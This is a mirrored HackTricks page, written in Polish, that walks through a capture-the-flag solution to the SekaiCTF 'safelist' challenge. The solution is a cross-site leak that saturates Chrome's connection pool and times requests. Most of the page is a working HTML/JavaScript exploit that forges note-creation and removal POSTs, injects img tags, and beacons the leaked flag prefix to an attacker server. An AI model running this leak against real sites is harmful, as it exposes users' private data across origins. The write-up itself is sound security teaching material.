mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-26 11:55:06 +00:00
140 lines
5.8 KiB
Markdown
140 lines
5.8 KiB
Markdown
|
# Connection Pool by Destination Example
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Wsparcie dla HackTricks</summary>
|
||
|
|
||
|
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Podziel się trikami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
W [**tym exploicie**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-safelist-html), [**@terjanq**](https://twitter.com/terjanq) proponuje kolejne rozwiązanie dla wyzwania wspomnianego na następnej stronie:
|
||
|
|
||
|
{% content-ref url="connection-pool-by-destination-example.md" %}
|
||
|
[connection-pool-by-destination-example.md](connection-pool-by-destination-example.md)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
Zobaczmy, jak działa ten exploit:
|
||
|
|
||
|
* Atakujący wstrzyknie notatkę z jak największą liczbą **`<img`** tagów **ładujących** **`/js/purify.js`** (więcej niż 6, aby zablokować źródło).
|
||
|
* Następnie atakujący **usunie** **notatkę** z indeksem 1.
|
||
|
* Następnie atakujący \[sprawi, że **bot uzyska dostęp do strony** z pozostałą notatką] i wyśle **żądanie** do **`victim.com/js/purify.js`**, które **zmierzy**. 
|
||
|
* Jeśli czas jest **większy**, **wstrzyknięcie** miało miejsce w **pozostałej notatce**, jeśli czas jest **mniejszy**, **flaga** była tam.
|
||
|
|
||
|
{% hint style="info" %}
|
||
|
Szczerze mówiąc, czytając skrypt, brakowało mi części, w której **atakujący sprawia, że bot ładuje stronę, aby wywołać tagi img**, nie widzę nic takiego w kodzie.
|
||
|
{% endhint %}
|
||
|
```html
|
||
|
<html>
|
||
|
<head>
|
||
|
<script>
|
||
|
const SITE_URL = 'https://safelist.ctf.sekai.team/';
|
||
|
const PING_URL = 'https://myserver';
|
||
|
function timeScript(){
|
||
|
return new Promise(resolve => {
|
||
|
var x = document.createElement('script');
|
||
|
x.src = 'https://safelist.ctf.sekai.team/js/purify.js?' + Math.random();
|
||
|
var start = Date.now();
|
||
|
x.onerror = () => {
|
||
|
console.log(`Time: ${Date.now() - start}`); //Time request
|
||
|
resolve(Date.now() - start);
|
||
|
x.remove();
|
||
|
}
|
||
|
document.body.appendChild(x);
|
||
|
});
|
||
|
}
|
||
|
|
||
|
add_note = async (note) => {
|
||
|
let x = document.createElement('form')
|
||
|
x.action = SITE_URL + "create"
|
||
|
x.method = "POST"
|
||
|
x.target = "xxx"
|
||
|
|
||
|
let i = document.createElement("input");
|
||
|
i.type = "text"
|
||
|
i.name = "text"
|
||
|
i.value = note
|
||
|
x.appendChild(i)
|
||
|
document.body.appendChild(x)
|
||
|
x.submit()
|
||
|
}
|
||
|
|
||
|
remove_note = async (note_id) => {
|
||
|
let x = document.createElement('form')
|
||
|
x.action = SITE_URL+"remove"
|
||
|
x.method = "POST"
|
||
|
x.target = "_blank"
|
||
|
|
||
|
let i = document.createElement("input");
|
||
|
i.type = "text"
|
||
|
i.name = "index"
|
||
|
i.value = note_id
|
||
|
x.appendChild(i)
|
||
|
document.body.appendChild(x)
|
||
|
x.submit()
|
||
|
}
|
||
|
|
||
|
const sleep = ms => new Promise(resolve => setTimeout(resolve, ms));
|
||
|
// }zyxwvutsrqponmlkjihgfedcba_
|
||
|
const alphabet = 'zyxwvutsrqponmlkjihgfedcba_'
|
||
|
var prefix = 'SEKAI{xsleakyay';
|
||
|
const TIMEOUT = 500;
|
||
|
async function checkLetter(letter){
|
||
|
// Chrome puts a limit of 6 concurrent request to the same origin. We are creating a lot of images pointing to purify.js
|
||
|
// Depending whether we found flag's letter it will either load the images or not.
|
||
|
// With timing, we can detect whether Chrome is processing purify.js or not from our site and hence leak the flag char by char.
|
||
|
const payload = `${prefix}${letter}` + Array.from(Array(78)).map((e,i)=>`<img/src=/js/purify.js?${i}>`).join('');
|
||
|
await add_note(payload);
|
||
|
await sleep(TIMEOUT);
|
||
|
await timeScript();
|
||
|
await remove_note(1); //Now, only the note with the flag or with the injection existsh
|
||
|
await sleep(TIMEOUT);
|
||
|
const time = await timeScript(); //Find out how much a request to the same origin takes
|
||
|
navigator.sendBeacon(PING_URL, [letter,time]);
|
||
|
if(time>100){
|
||
|
return 1;
|
||
|
}
|
||
|
return 0;
|
||
|
}
|
||
|
window.onload = async () => {
|
||
|
navigator.sendBeacon(PING_URL, 'start');
|
||
|
// doesnt work because we are removing flag after success.
|
||
|
// while(1){
|
||
|
for(const letter of alphabet){
|
||
|
if(await checkLetter(letter)){
|
||
|
prefix += letter;
|
||
|
navigator.sendBeacon(PING_URL, prefix);
|
||
|
break;
|
||
|
}
|
||
|
}
|
||
|
// }
|
||
|
};
|
||
|
</script>
|
||
|
</head>
|
||
|
<body>
|
||
|
</body>
|
||
|
</html>
|
||
|
|
||
|
```
|
||
|
{% hint style="success" %}
|
||
|
Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Wsparcie HackTricks</summary>
|
||
|
|
||
|
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Dziel się trikami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|